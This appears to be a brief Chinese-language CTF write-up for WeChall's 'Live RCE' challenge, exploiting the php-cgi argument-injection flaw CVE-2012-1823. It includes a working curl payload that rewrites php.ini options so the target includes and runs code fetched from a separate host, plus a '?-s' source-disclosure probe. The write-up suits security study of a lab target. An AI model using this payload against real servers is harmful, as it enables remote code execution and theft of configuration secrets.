PHP wechall

Warchall: Live RCE

Posted by rk700 on July 3, 2014

http://www.wechall.net/challenge/warchall/live_rce/index.php
这道题开始试了半天,发现没有注入什么的……然后在网上搜php rce,发现了有这个问题:CVE-2012-1823

根据解释,如果query string中不包含未urlencoded的等号,那么整个query会以空格分词,传给php-cgi。于是我们传-s,就会把php文件源码回显。试了http://rce.warchall.net/?-s,发现确实存在这个问题

然后我们就可以远程执行代码了

$ curl http://rce.warchall.net/?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2fnabla.users.warchall.net%2f1+-n

这里会重写php.ini,使http://nabla.users.warchall.net/1被包含,于是类似于rfi。最后发现答案在文件../config.php

FEATURED TAGS
HTTP wechall PHP linux sql exploit crypto OverTheWire reverse how-to binary pwnable.kr ksnctf misc android webhacking.kr fuzzing